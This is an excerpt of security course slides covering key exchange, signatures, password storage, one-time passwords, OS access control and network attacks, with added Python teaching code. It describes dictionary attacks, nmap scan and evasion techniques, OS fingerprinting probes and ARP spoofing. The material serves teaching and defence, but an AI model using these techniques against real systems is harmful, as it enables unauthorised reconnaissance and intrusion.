Asymmetric Key Exchange With Server (P doesn't know R's public key). The server provides public keys for everyone. Exchange is as in the previous case. How do you ensure that the server has the right public key for everyone? In practice, the server issues certificates encoded in DER.
Show openssl x509 -inform der -in pub.der -text.

Security Protocols p.195

Encrypted Key Exchange [BM92]
P_A is a randomly generated public key. Even if K_AB is weak, finding K in message two is hard. Messages 3–5 provide mutual authentication and freshness of this run of the protocol.
1. A → B: K_AB(P_A)
2. B → A: K_AB(P_A(K))
3. A → B: K(C_A)
4. B → A: K(C_A | C_B)
5. A → B: K(C_B)

Security Protocols p.196

Key Exchange in SSL
1. C → S: Supported cipher suites, 28B randomness r1
2. S → C: Chosen cipher suite, 28B randomness r2
3. S → C: Server cert
4. C → S: E_servPubKey(Client selected 48B PMS)
Both parties compute MS = h(pms || r1 || r2). Encryption & MAC keys are derived from MS.

Does this protocol provide client authentication? Also see the SSL protocol.

Security Protocols p.197

DH Key Exchange. . . unauthenticated
Alice → Bob: g^a
Bob → Alice: g^b
Both Alice and Bob compute g^ab. g, p are known in advance. In practice, do this in a large subgroup of Z_p*. Subject to person-in-the-middle attack. Diffie-Hellman problem: given g^a, g^b, compute g^ab. Certainly no harder than DLog. Does DLog hard ⇒ DH secure? Open problem. (Strong evidence.)

Security Protocols p.198

DH. . . person-in-the-middle
Alice → Eve: g^a, and Eve → Bob: g^p
Bob → Eve: g^b, and Eve → Alice: g^q
Alice believes she's talking to Bob because messages make semantic sense. A simple challenge-response protocol from Alice to verify Bob succeeds. (Should ask for challenge + DH params for connection.) Eve establishes the shared key g^aq with Alice, and g^pb with Bob. Eve deciphers every message between Alice and Bob.

Security Protocols p.199

Diffie-Hellman in practice
p = 1024-bit prime. q, a prime s.t. q | (p − 1) and q ≈ 2^160 (160 bits). g ∈ Z_p*, an element of order q.
Now a ∈ {0, 1, . . . , q − 1} and b ∈ {0, 1, . . . , q − 1}. Since q is 160 bits, g^a (mod p) only needs 160 multiplies rather than 1024. A seven fold improvement!
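Subgroup Diffie-Hellman as on the slide (q | p − 1, g of order q, exponents below q), with the membership check a receiver should run on the peer's value. This is an added example, not the course's code; the parameter generator, Miller-Rabin test and toy sizes (64-bit p, 24-bit q instead of 1024/160) are constructed here so it runs instantly.

```python
"""Diffie-Hellman in a prime-order subgroup, as on the slide: q | (p - 1),
g of order q, exponents drawn from {1..q-1}. Constructed toy parameter sizes."""
import random

SMALL_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]


def is_probable_prime(n: int) -> bool:
    """Miller-Rabin with fixed bases; deterministic for n < 3.3e24."""
    if n < 2:
        return False
    for sp in SMALL_PRIMES:
        if n % sp == 0:
            return n == sp
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for a in SMALL_PRIMES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_params(p_bits: int, q_bits: int, rng: random.Random):
    """Return (p, q, g): q prime, p = k*q + 1 prime, g = h^((p-1)/q) != 1."""
    while True:
        q = rng.getrandbits(q_bits) | (1 << (q_bits - 1)) | 1
        if is_probable_prime(q):
            break
    while True:
        k = (rng.getrandbits(p_bits - q_bits) | (1 << (p_bits - q_bits - 1))) & ~1
        p = k * q + 1
        if is_probable_prime(p):
            break
    while True:
        g = pow(rng.randrange(2, p - 1), (p - 1) // q, p)
        if g != 1:                        # then g has order exactly q
            return p, q, g


def valid_public(p: int, q: int, y: int) -> bool:
    """Reject values outside the order-q subgroup (small-subgroup check)."""
    return 1 < y < p and pow(y, q, p) == 1


def keygen(p, q, g, rng):
    a = rng.randrange(1, q)               # a 160-bit exponent in practice
    return a, pow(g, a, p)


def shared_secret(p, q, priv, peer_pub):
    if not valid_public(p, q, peer_pub):
        raise ValueError("peer value is not in the order-q subgroup")
    return pow(peer_pub, priv, p)


def exponent_savings(p: int, q: int) -> float:
    """Square-and-multiply cost scales with exponent length: ~1024 vs ~160."""
    return (p - 1).bit_length() / q.bit_length()


if __name__ == "__main__":
    rng = random.Random(7)
    p, q, g = gen_params(64, 24, rng)
    a, A = keygen(p, q, g, rng)
    b, B = keygen(p, q, g, rng)
    print(shared_secret(p, q, a, B) == shared_secret(p, q, b, A))
```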

Security Protocols p.200

Digital Signatures
Suppose you send e-mail to your bank to transfer $100 to Tim's account. Why should the bank believe the e-mail came from you [unaltered]? Authentication (and integrity). If the bank transferred the money, maybe you can disavow the e-mail. Non-repudiation. In case of dispute, can it be settled by a neutral third party? Signatures basically provide the non-repudiation that shared key systems do not.

Security Protocols p.201

Digital Signatures with Symmetric Encryption

With the aid of a trusted third party! A signature is the encryption of the message. E_KS is S's encryption key, while E_KR is R's encryption key. A is the trusted third party (arbiter).
S → A: E_KS(M).
A → R: E_KR(M, S, E_KS(M)). "A says that S said M."

Security Protocols p.202

Digital Signatures With Public Key Encryption

Authentic but not private: S → R: D_S(M).
S → R: E_R(D_S(M)). But what if R decrypts the outer layer and re-encrypts the inner message to create a new message E_U(D_S(M))? This would make it appear as if S sent a signed message to U!

Security Protocols p.203

Digital Signatures With Public Key Encryption (El Gamal)

From [TW02, Sec. 8.2]. Prime p, generator α of Z_p*, i.e., ord(α) = (p − 1). Private key 1 ≤ a ≤ (p − 2), public key β = α^a.
Pseudo-random integer k < (p − 1), coprime to p − 1; r = α^k.
Signature on m: s = (m − ar)k^{-1} mod (p − 1).
Computing s seems to require knowledge of a (private key) & k, which requires the ability to compute discrete logs. Signature is the pair (r, s). Precomputing of (k, r) pairs is possible and signature generation is then cheap!
Security Protocols p.204

Digital Signatures With Public Key Encryption (El Gamal). . .

Verification: α^m ≡ β^r r^s (mod p).
Verification only requires (α, β, r), all of which are public. Verification requires exponentiation! To derive the verification equation from first principles, consider that
s = (m − ar)k^{-1} mod (p − 1)
α^s = α^{(m − ar)k^{-1}} (mod p)
(α^s)^k = α^{(m − ar)k^{-1}k} (mod p) = α^{(m − ar)} (mod p)
r^s = α^m β^{−r} (mod p)
β^r r^s = α^m (mod p)
Look at [Sta99, pg. 229] for why we go from the first equality, which is mod (p − 1), to the second equality, which is mod p. It's because p − 1 = φ(p).
Security Protocols p.205

Digital Signatures With Public Key Encryption (El Gamal). . .

For forgery, Eve needs to compute s for message m s.t. the verification eqn α^m ≡ β^r r^s (mod p) is satisfied. Let's say she randomly chooses r = α^k. Then s = log_r(α^m β^{−r}). So, she must be able to compute discrete logs for base α^k. If she chooses r = α^k of small order, then it's unclear whether DL(s) would exist for it.
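The El Gamal signature of the last three slides carried through in code: key generation, signing with the (k, r) precomputation the slide mentions, and the verification equation α^m ≡ β^r r^s (mod p). Added example, not the textbook's code; p = 467, α = 2 and the key/nonce values are constructed small parameters, and a deployment would sign a hash of the message rather than m itself.

```python
"""El Gamal signatures as on the slides: public (p, alpha, beta), r = alpha^k,
s = (m - a r) k^{-1} mod (p-1), verify alpha^m == beta^r r^s (mod p)."""
from math import gcd
import random


def is_generator(alpha: int, p: int) -> bool:
    """alpha generates Z_p^* iff alpha^((p-1)/f) != 1 for every prime f | p-1."""
    n, factors, f = p - 1, set(), 2
    while f * f <= n:
        while n % f == 0:
            factors.add(f)
            n //= f
        f += 1
    if n > 1:
        factors.add(n)
    return all(pow(alpha, (p - 1) // f, p) != 1 for f in factors)


def keygen(p: int, alpha: int, a: int):
    """Private key a in [1, p-2]; public key beta = alpha^a mod p."""
    if not is_generator(alpha, p) or not 1 <= a <= p - 2:
        raise ValueError("bad parameters")
    return (p, alpha, pow(alpha, a, p)), a


def sign(m: int, a: int, p: int, alpha: int, k: int):
    """k must be invertible mod p-1; never reuse k across messages (it leaks a)."""
    if gcd(k, p - 1) != 1:
        raise ValueError("k not invertible mod p-1")
    r = pow(alpha, k, p)
    s = (m - a * r) * pow(k, -1, p - 1) % (p - 1)
    return r, s


def verify(m: int, sig, pub) -> bool:
    p, alpha, beta = pub
    r, s = sig
    if not 0 < r < p:                     # standard range check on r
        return False
    return pow(alpha, m, p) == pow(beta, r, p) * pow(r, s, p) % p


def precompute_pairs(p: int, alpha: int, rng: random.Random, count: int):
    """The slide's optimisation: (k, r) pairs made ahead of time, so signing
    later costs one multiplication and one modular inverse."""
    pairs = []
    while len(pairs) < count:
        k = rng.randrange(1, p - 1)
        if gcd(k, p - 1) == 1:
            pairs.append((k, pow(alpha, k, p)))
    return pairs


def sign_with_pair(m: int, a: int, p: int, pair):
    k, r = pair
    return r, (m - a * r) * pow(k, -1, p - 1) % (p - 1)


if __name__ == "__main__":
    pub, priv = keygen(467, 2, 127)       # constructed small parameters
    sig = sign(100, priv, 467, 2, 213)
    print(sig, verify(100, sig, pub), verify(101, sig, pub))
```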

Security Protocols p.206

Digital Sig without Encryption
Use a strong hash function and a trusted third party. S uses a hash function f_s (only S and A know it) and R uses f_r (only R and A know it). Both share these functions with the arbiter A.
S → A: (M, f_s(M)). "S said M."
A → R: (M, S, f_s(M) [e], f_r(M, S)). "A says that S said M."
e: evidence in case of future dispute.

Security Protocols p.207

Key Escrow
Provide strong security for communications while simultaneously allowing authorized government access to particular communications for law enforcement and national security purposes [DS94]. The EES uses SKIPJACK (64-bit block, 80-bit key) and a Law Enforcement Access Field (128-bit LEAF) transmitted with every message. Each Clipper chip has an 80-bit Device Unique key (K_U) and an 80-bit common Family Key (K_F). Key exchange method unspecified. A session key K_S is somehow generated.

Security Protocols p.208

Key Escrow. . .
Encryption could be used to conceal criminal and terrorist activities. By rendering communications immune from lawful interception, encryption threatens law enforcement and public safety. Special tamper-resistant hardware encryption device (Clipper) and a Key Escrow System (KES).

Security Protocols p.209

Key Escrow. . .
The LEAF and IV are transmitted for synchronization and LEAF validation. Infeasible to deploy the system without transmitting a valid LEAF [Bla94]. Session key (K_S) is encrypted with the device key K_U. Unit id identifies K_U. The whole LEAF is encrypted under K_F. The receiving chip is unable to extract K_S from the LEAF.
LEAF = E_KF( E_KU(K_S) (80b) | unit id (32b) | cksum (16b) )

Security Protocols p.210

Mental Poker
A → B: E_KA(C_1), . . . , E_KA(C_52). C_i = Jack of Spades. B chooses five and sends to A: E_KB(E_KA(C_i)), . . . , E_KB(E_KA(C_m)). A unlocks the five that B has chosen [D_KA(E_KB(E_KA(C_i))), . . . , D_KA(E_KB(E_KA(C_m)))] to yield [E_KB(C_i), . . . , E_KB(C_m)] and sends them back to B. B can now get C_i . . . C_m.

Security Protocols p.211

Mental Poker. . .
To realize this scheme, one can use (C_i^{K_A})^{K_A^{-1}} = C_i.
Michael Goodrich has a written description of mental poker here.

Security Protocols p.212

Who will pay for dinner? Flipping a Coin.

If it's heads, Pete will pay, if it's tails, Nancy pays. So Pete flips a coin in his office and tells Nancy the result over the phone! Pete offers Nancy a choice of two. Nancy picks one but blinds it. She is committed to her choice when she sends her selection to Pete. Pete selects one of the above two blinded choices. The toss outcome depends on whether both made the same or different selections. Pete is committed to his choice when he sends his selection to Nancy.

Security Protocols p.213

Who will pay for dinner?. . .


Pete selects two public key pairs: (E_i, D_i), (E_j, D_j). Nancy chooses K_N for a symmetric algorithm S known to both.
P → N: (E_i, E_j).
N → P: E_h(K_N), h picked at random, h = i | j.
P → N: sends M = E_{K_P}("Pete will pay"). P guesses h and retrieves K_P = D_h(E_h(K_N)).
If Nancy can read D_{K_N}(M), Pete pays, otherwise Nancy pays.

Security Protocols p.214

Coin Flipping using Quadratic Residues

From [Sch97, Section 19.3]. A selects two large primes and computes n = p · q. A sends n to B. [For p, q ≡ 3 (mod 4) there's a deterministic method to find square roots.]
B picks a random x < n and computes z = x^2 mod n. B sends z to A. A computes the four square roots of z, ±x and ±y. A sends one of these four values, say α, to B.
Consider the pair (a, b), a = x mod p, b = x mod q. By CRT, (a, b), (−a, b), (a, −b), (−a, −b) are square roots of z.
B verifies that α^2 = x^2 mod n. If α = ±x, A wins, otherwise B wins.

Security Protocols p.215

Coin Flipping using Quadratic Residues. . .

If B says he's won, why should A believe him? Because B can now factor n with knowledge of α and x. Because GCD(α + x, n) ∈ {p, q}. If α^2 ≡ x^2 mod n, then n | (α^2 − x^2). If n | (α − x)(α + x) then for α ≠ ±x, p divides one of (α − x) or (α + x) and q divides the other.
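The quadratic-residue coin flip of the last two slides, run end to end: the p ≡ 3 (mod 4) square root, the CRT combination into four roots, B's check of α, and the GCD step that factors n when A's root is not ±x. Added example, not from the course; p = 47, q = 59 and B's choice of x are constructed toy values.

```python
"""Coin flipping with quadratic residues, as on the slides: A knows n = p*q,
B commits to z = x^2 mod n, A returns one of the four square roots, and B can
factor n whenever the root is not +-x."""
from math import gcd
import random


def sqrt_mod_p3(z: int, p: int) -> int:
    """Deterministic square root of a residue when p = 3 (mod 4)."""
    if p % 4 != 3:
        raise ValueError("needs p = 3 mod 4")
    root = pow(z % p, (p + 1) // 4, p)
    if root * root % p != z % p:
        raise ValueError("z is not a quadratic residue mod p")
    return root


def crt(a: int, b: int, p: int, q: int) -> int:
    """The x < pq with x = a (mod p) and x = b (mod q)."""
    return (a * q * pow(q, -1, p) + b * p * pow(p, -1, q)) % (p * q)


def four_roots(z: int, p: int, q: int):
    """(+-a, +-b) combined by CRT: the four square roots of z mod pq."""
    a, b = sqrt_mod_p3(z, p), sqrt_mod_p3(z, q)
    return sorted({crt(s * a, t * b, p, q) for s in (1, -1) for t in (1, -1)})


def play(p: int, q: int, x: int, pick=random.choice):
    """One coin flip. Returns ('A', None) if A wins, else ('B', (p, q)) with
    the factorisation B recovers. pick models A's blind choice of root."""
    n = p * q
    if not 1 < x < n or gcd(x, n) != 1:
        raise ValueError("B must pick 1 < x < n coprime to n")
    z = x * x % n                           # B -> A: z (x stays secret)
    alpha = pick(four_roots(z, p, q))       # A -> B: one root alpha
    if alpha * alpha % n != z:              # B verifies alpha^2 = x^2 mod n
        raise ValueError("A cheated: alpha is not a root of z")
    if alpha in (x, n - x):
        return "A", None
    f = gcd(alpha + x, n)                   # n | (alpha-x)(alpha+x), alpha != +-x
    return "B", tuple(sorted((f, n // f)))


if __name__ == "__main__":
    print(play(47, 59, 100))                # constructed toy primes and x
```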

Security Protocols p.216

Chaums Blind Signature

Security Protocols p.217

Dining CryptographersA Flavor

Security Protocols p.218

Zero KnowledgeA Flavor


Use Nasir's slides (nasir-zk.ppt). [KPS02, Section 6.8] also has a treatment of ZK.

Security Protocols p.219

Bit Commitment
Adapted from [TW02, Section 7.3]. Alice wants to make a private statement that, once made, cannot be changed. If computing discrete logs is hard, then Alice can commit a message m by making public c = α^m, where α is a generator of Z_p*. The commitment c can be later verified because m → c is a 1 : 1 onto operation.

Security Protocols p.220

Winnowing & Chaffing

Security Protocols p.221

How to leak a secret?

Security Protocols p.222

Operating System Security

Security Protocols p.223

Protection in General Purpose OS


Adapted from [P96, Chapter 6]. Why protect the OS? Operating Systems support multiprogramming, so they've developed ways to protect the computation of one user from inadvertent or malicious interference from another.

OS Security p.224

Protection in General Purpose OS. . .


Executives. Provided linkers and loaders for relocation. Provided easy access to compilers, assemblers. Provided automatic loading of subprograms from libraries.
Monitors. Provide scheduling, sharing, and parallel use of resources: memory, I/O devices, sharable programs and data. Oversaw all computing.

OS Security p.225

Security Methods of OSes


The basis of protection is separation. Physical Separation. Poor resource utilization. Temporal Separation. Poor resource utilization. Logical Separation. Cryptographic Separation.

OS Security p.226

Security Methods of OSes. . .


Separation is only half the answer. The other half is controlled sharing. All or Nothing. Access control on objects. Capabilities. Partial use of objects. E.g., the ability to read but not print as in Adobe reader. Collect statistics from a database but not the actual records. What is the granularity of sharing?

OS Security p.227

Protecting Memory
Using a fixed fence with non-relocatable programs that know the fence value at compile time. Protection in only one direction. You can shoot yourself in the foot. Cannot sub-partition programs into a finer granularity of protection.

OS Security p.228

Protecting Memory. . .
Using variable sized fences with programs compiled starting at address 0. Programs not relocated, rather indirection used with the fence value stored in a register. Provides relocation and protection at the same time.

OS Security p.229

Protecting Memory. . .
Base/bounds registers. Provide both lower and upper bounds. Change them for every program at context switch. Use additional base/bounds registers for finer granularity partitions, say code and data.

OS Security p.230

Protecting MemorySegmentation
Addresses are of the form <seg #, offset>. Segments can be separately relocated and protected. Each process would normally have its own segment table for address translation. Processes that want to share segments map them to the same segment numbers in their segment table.

OS Security p.231

Protecting MemorySegmentation. . .

Pros and Cons: Fine granularity of protection, on a per-segment basis. Can lead to fragmentation of main memory. Requires compaction. Sharing requires same segment numbers in all sharing processes because of inter segment references.

OS Security p.232

Paging
Addresses are of the form <page #, offset>. All pages are of the same size.

OS Security p.233

Segmentation+Paging
Break a segment into pages.

OS Security p.234

User Authentication
The process whereby a system is assured of the identity of the user involved in a protocol and that the user has actually participated. Message authentication itself provides no timeliness guarantees w.r.t. when the message was created. User authentication is a real-time process. Adapted from [Den04, Week 4].

OS Security p.235

Bases of User Authentication


Something the user knows, e.g., passwords, PINs. Something the user possesses, e.g., smart card, tokens. Something the user is (or how he behaves), known as biometrics, or the measurement of some biological property of the user, e.g., fingerprints. We are only concerned with password based user authentication here.

OS Security p.236

User Authentication. . .
Alice ↔ Bob.
Concerns: eavesdropping, exposing secrets on the server.
Goal: no secrets on the server + foil eavesdropping.
Methods: passwords, one-time passwords, challenge-response protocols, zero-knowledge authentication.

In typical environments, authentication has to be combined with session key exchange protocol (for encryption/authentication) to foil session hijacking.

OS Security p.237

Passwords
Used to authenticate people. Have low entropy (≈ 25 bits).
2^25 = 33554432, 255^8 = 17878103347812890625.
Susceptible to eavesdropping, replay to the server. A → B: pwd1, pwd2, . . . , pwdn.

OS Security p.238

Passwords. . .
Never store passwords on the server. Store the password hash instead. Don't need the ability to invert. If this file is exposed, an adversary can mount a dictionary attack:
for (every word w in dictionary) { compute h(w); lookup h(w) in this file. }

OS Security p.239

Passwords. . .
Unix uses a modified DES algorithm with 12 bits of salt, a two-char string from the set [a-zA-Z0-9./]. It is used to perturb the algorithm in one of 4096 different ways. Usually encrypts 0 with the key 25 times. The value stored in the password file is a series of 13 printable ASCII characters (the first two characters are the 12-bit salt itself and the remaining 11 characters encode the 64-bit encryption of 0). See crypt(3). Suppose 10M words in the dictionary, 12-bit salt: then we have 10M × 4K = 40G encrypted passwords. Assuming an average length of 8 bytes gives 320GB. If one encryption is done in one μs, the dictionary can be encrypted in 40 × 10^9 × 10^−6 = 4 × 10^4 s ≈ 10 hours.

OS Security p.240

PasswordsSalting
Salt makes the dictionary attack harder. An attacker must hash every word in the dictionary 2^12 times. Logically, it looks like:
Alice | salt_a | h(P_a || salt_a)
Bob | salt_b | h(P_b || salt_b)
Secret salt: salt'_a is 4 bits. To verify a user's password, the system tries all 2^4 combinations of salt'_a. Attacker's work goes up by 16. Store Alice | salt_a | h(P_a || salt_a || salt'_a).
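The salted record of the last two slides with the 4-bit secret salt added, and the verifier that tries all 16 values. Added example, not from the course: SHA-256 stands in for crypt(3)'s DES-based hash, the public salt is 16 random bits instead of 12, and the record format user|salt|hash is constructed.

```python
"""Salted, secret-salted password storage as on the slide: the record is
user | salt | h(P || salt || salt'), where salt' is a 4-bit secret salt that is
not stored and is brute-forced at verification time."""
import hashlib
import hmac
import os

SECRET_SALT_BITS = 4                    # the slide's salt'_a
SECRET_SPACE = 1 << SECRET_SALT_BITS    # 16 trial values per verification


def _digest(password: bytes, salt: bytes, secret_salt: int) -> bytes:
    # SHA-256 stands in for crypt(3); a real scheme should be deliberately slow.
    return hashlib.sha256(password + salt + bytes([secret_salt])).digest()


def make_record(user: str, password: bytes, salt: bytes = None,
                secret_salt: int = None) -> str:
    """Return 'user|salt-hex|hash-hex'. salt is stored in the clear; the
    secret salt is random and deliberately forgotten after hashing."""
    if salt is None:
        salt = os.urandom(2)
    if secret_salt is None:
        secret_salt = os.urandom(1)[0] % SECRET_SPACE
    return "%s|%s|%s" % (user, salt.hex(),
                         _digest(password, salt, secret_salt).hex())


def verify(record: str, password: bytes) -> bool:
    """Try all 2^4 secret salts. An attacker pays the same 16x per guess,
    and must redo it per user because of the public salt."""
    _, salt_hex, hash_hex = record.split("|")
    salt, stored = bytes.fromhex(salt_hex), bytes.fromhex(hash_hex)
    ok = False
    for secret_salt in range(SECRET_SPACE):
        # no early exit, so timing does not reveal which value matched
        ok |= hmac.compare_digest(_digest(password, salt, secret_salt), stored)
    return ok


if __name__ == "__main__":
    rec = make_record("alice", b"correct horse")
    print(rec, verify(rec, b"correct horse"), verify(rec, b"wrong"))
```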

OS Security p.241

Biometrics

OS Security p.242

One-Time Passwords
Lamport hash (S/Key) based on a hash chain [KPS02, Section 12.2]. Alice remembers a password p. Bob (server) remembers (user, n, h^n(p)).
A → B: A (I am Alice)
B → A: n
A → B: x = h^{n−1}(p)

OS Security p.243

One-Time Passwords. . .
Pros and Cons. Can only log in a finite # of times. No mutual authentication. Small n attack: what if Alice can be tricked into revealing h^50(p)?
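The Lamport chain of the two slides above as server and client objects, including the replay rejection and a client-side guard against the small-n attack. Added example, not the course's or S/Key's code; SHA-256 as h, the in-memory table and the "expected n" rule on the client are constructed here.

```python
"""Lamport hash chain (S/Key-style) one-time passwords, as on the slide."""
import hashlib
import hmac
from typing import Optional


def h(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()


def h_iter(x: bytes, n: int) -> bytes:
    """h^n(x): apply h n times."""
    for _ in range(n):
        x = h(x)
    return x


class OTPServer:
    """Bob: stores (user, n, h^n(p)); never stores p itself."""

    def __init__(self):
        self.table = {}

    def register(self, user: str, password: bytes, n: int) -> None:
        self.table[user] = (n, h_iter(password, n))

    def challenge(self, user: str) -> int:
        return self.table[user][0]               # B -> A: n

    def login(self, user: str, x: bytes) -> bool:
        """A -> B: x = h^{n-1}(p). Accept iff h(x) equals the stored value,
        then move the stored value one step down the chain."""
        n, stored = self.table[user]
        if n <= 1:
            return False                         # chain exhausted: re-register
        if not hmac.compare_digest(h(x), stored):
            return False                         # wrong password or replayed x
        self.table[user] = (n - 1, x)
        return True


class OTPClient:
    """Alice: remembers p and the n she expects the server to ask for."""

    def __init__(self, password: bytes, n: int):
        self.password = password
        self.expected_n = n

    def respond(self, n: int) -> Optional[bytes]:
        # Small-n defence: a "server" asking for a smaller n than expected
        # would be fishing for an h^{n-1}(p) that unlocks every later login.
        if n != self.expected_n:
            return None
        self.expected_n -= 1
        return h_iter(self.password, n - 1)


def run_session(server: OTPServer, client: OTPClient, user: str) -> bool:
    n = server.challenge(user)
    x = client.respond(n)
    return x is not None and server.login(user, x)


if __name__ == "__main__":
    srv, cli = OTPServer(), OTPClient(b"correct horse", 1000)
    srv.register("alice", b"correct horse", 1000)
    print(run_session(srv, cli, "alice"), cli.respond(50))
```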

OS Security p.244

File Protection Mechanisms


Adapted from [P96, Section 6.4]. All or Nothing Protection: trust and ignorance. May work in systems with few users who trust each other. No convenient way of limiting file access to a subset of users.

OS Security p.245

File Protection Mechanisms. . .


Discretionary Access Control
Group Protection: need to share in a controlled way. (owner, group, world): rwxrwxrwx. Define access rights on file creation. For e.g., the open(path, mode) syscall will use (defaults & umask). A user is identified by two identifiers (numbers), the user-id and the group-id. On Linux, /etc/passwd contains a record for every user (non NIS): user_name:pwd:uid:gid:comment:home_dir:login_shell (e.g., root and lroot). /etc/group defines groups (newgrp): group_name:pwd:gid:uid_list.

OS Security p.246

File Protection Mechanisms. . .DAC


File and Directory permissions (there are ACLs in other OSes). Sticky bit on directories: allows removal/renaming of files that you own. /tmp is drwxrwxrwt on my machine.
Turning on sticky bits turns on mode bits 111. Extra attributes on the ext2 FS: lsattr, chattr. 1 word (include/linux/ext2_fs.h) = { A (don't update atime), a (open append only), c (compress), d (mark for dump), i (immutable), s (zero blocks on delete), S (write synchronously), u (save contents on delete) }.
OS Security p.247

File Protection Mechanisms. . .DAC


Quota (# of blocks/inodes), ulimit (core file size, max data segment size, max cpu time, max open files): struct rlimit rlim[RLIM_NLIMITS]; (linux/include/sched.h). Setuid. Permits a user to establish data files to which access is allowed only through specified procedures. Say, for example, the /etc/passwd file being manipulated by /usr/bin/passwd, which is setuid root.

OS Security p.248

Network Security

OS Security p.249

OSI Network Protocol Stack


Layer  OSI           TCP/IP       Function
7      Application   Application
6      Presentation
5      Session
4      Transport     Transport    Demuxing within a machine, in-order delivery.
3      Network       Internet     End-to-end routing and addressing.
2      Data link     Data link    Channel access, framing.
1      Physical      Physical     Bits, encoding (Manchester), modulation.

Network Security p.250

Port ScanningNmap
To find services (exploitable communication channels) running on your machine. TCP header (one 32-bit word per row):
Source port | Destination port
Sequence number
Acknowledgement number (1 + last byte # recvd)
Hdr len | Reserved | Code | Window
Checksum | Urgent pointer
Options (if any) | padding
DATA
CODE is 6 bits, from left to right: URG, ACK, PSH, RST, SYN, FIN.

Network Security p.251

Port scanning. What ports are open on a machine? See the nmap doc for details. TCP connect scanning: can result in application-level logging. TCP SYN scanning aka stealth mode: leads to denial of service in many OSes (half-open connections); could be logged. TCP FIN scanning: on *nix, this generates RST on a closed port and is ignored on open ports. Fragmentation scanning: split the TCP header (SYN) into multiple packets so intermediate filters can't filter it. UDP port scanning by received ICMP port unreachable messages; parallelism may be limited by the host's error rate limit.
Xmas tree scan: FIN|URG|PSH in an attempt to let the firewall pass the packet through.
Network Security p.252
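A parser for the TCP header layout on the slide, with the CODE bits decoded and the probe types from the port-scanning slide named from the flag set, as a detector on the receiving side would do it. Added example, not from the course or nmap; the sample headers are constructed in the script (checksums left at 0) and never sent anywhere.

```python
"""Parse the slide's TCP header layout and label scan-style flag combinations."""
import struct

# CODE bits, left to right in the header: URG, ACK, PSH, RST, SYN, FIN
CODE_BITS = [(0x20, "URG"), (0x10, "ACK"), (0x08, "PSH"),
             (0x04, "RST"), (0x02, "SYN"), (0x01, "FIN")]


def parse_tcp_header(segment: bytes) -> dict:
    """Unpack the 20-byte fixed header (network byte order) plus options."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    (sport, dport, seq, ack, off_code, window,
     checksum, urgent) = struct.unpack("!HHIIHHHH", segment[:20])
    hdr_len = (off_code >> 12) * 4          # 4-bit header length, 32-bit words
    if hdr_len < 20 or hdr_len > len(segment):
        raise ValueError("bad header length %d" % hdr_len)
    code = off_code & 0x3F                  # low 6 bits: the CODE field
    return {
        "src_port": sport, "dst_port": dport, "seq": seq, "ack": ack,
        "hdr_len": hdr_len, "window": window, "checksum": checksum,
        "urgent": urgent,
        "flags": [name for mask, name in CODE_BITS if code & mask],
        "options": segment[20:hdr_len],
        "data": segment[hdr_len:],
    }


def classify_flags(flags) -> str:
    """Name the probe types from the port-scanning slide by their flag set."""
    s = frozenset(flags)
    if not s:
        return "NULL probe (no flags)"
    if s == {"FIN", "URG", "PSH"}:
        return "Xmas tree probe"
    if s == {"FIN"}:
        return "FIN probe"
    if s == {"SYN"}:
        return "SYN (connection attempt; half-open scan if never completed)"
    if s == {"SYN", "ACK"}:
        return "SYN+ACK (second step of handshake)"
    return "ordinary segment"


def classify_segment(segment: bytes) -> str:
    return classify_flags(parse_tcp_header(segment)["flags"])


def _sample(flags, sport=40000, dport=22, seq=1, ack=0):
    """Constructed sample header for the parser; checksum left 0."""
    code = sum(mask for mask, name in CODE_BITS if name in flags)
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                       (5 << 12) | code, 8192, 0, 0)


SAMPLES = {
    "syn": _sample(["SYN"]),
    "xmas": _sample(["FIN", "URG", "PSH"]),
    "null": _sample([]),
    "synack": _sample(["SYN", "ACK"], sport=22, dport=40000, seq=7, ack=2),
}


if __name__ == "__main__":
    for label, seg in SAMPLES.items():
        print(label, parse_tcp_header(seg)["flags"], "->", classify_segment(seg))
```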

Remote OS detection via TCP/IP Stack Fingerprinting

Why? Many security holes dependent on OS version. Scan a network for (OS, svc) pairs and wait for next exploit. Social engineering. How? Just telnet to the machine. Telnet to the ftp port (telnet mirror.nus ftp). DNS host info record. (nslookup, set type=hinfo, www.comp.nus.edu.sg). snmpwalk.

Network Security p.253

Remote OS detection via TCP/IP Stack Fingerprinting. . . Basically, look for things that are different among OSes and write a probe for the difference. Examples: FIN scan to a known open port: Windows boxes will send RST back while *nix boxes will silently discard it. BOGUS flag returned on some Linuxes: (SYN+BOGUS) returns (ACK+BOGUS). ISN sampling: some always use the same ISN! Random increments, true random, time-dependent model, . . . Don't Fragment bit in the IP header. TCP initial window size (during handshake or on RST packets): AIX = 16165! ACK value on RST returned on a FIN|PSH|URG sent to a closed port?

Network Security p.254

Remote OS detection via TCP/IP Stack Fingerprinting. . . ICMP error message rate. Some systems such as Linux will rate limit the returned error messages. ICMP message quoting size. How much of the offending packet is returned. Only header+64 bits returned or more or the whole packet. TOS on ICMP port unreachables. Overlapping fragments for TCP. Fragmentation handling. TCP options, which ones supported, order of return,. . .

Network Security p.255

Remote OS detection via TCP/IP Stack Fingerprinting. . . Examples of Nmap configuration:
T5 (DF=N%W=0%ACK=S++%Flags=AR%Ops=). SYN to a closed port. T5 is a predefined test whose response should match the spec above.
T6 (DF=N%W=0%ACK=O%Flags=R%Ops=). ACK to a closed port.
IP header (one 32-bit word per row):
vers | hlen | svc type | total len
ident | flags | frag offset
ttl | protocol | hdr checksum
source ip addr
dest ip addr
ip options (if any) | padding
DATA

Network Security p.256

Passive Snifng Attacks


Can capture clear text passwords, e.g., in telnet. Can capture cookies in HTTP traffic.

Network Security p.257

Active Attacks
Kill active TCP connections by sending RST. ARP spoofing: connections can be redirected through another host. See securitypronews for an exploit with EtterCap. TCP spoofing with sequence number guessing. TCP connection hijacking.

Network Security p.258

ARP Spoong
Adapted from hackinthebox. (Figure: hosts A, B and C.)
If B will accept a gratuitous ARP reply, then A → B: mac_C = mac_A and A → C: mac_B = mac_A. The protocol ought to accept answers only for outstanding queries. In any event the answers are unauthenticated.

Network Security p.259

Morris Sr.'s attack
(Figure: 1. E → A: SYN with source B; 2. A → B: SYN+ACK; 3. E → A: ACK.)
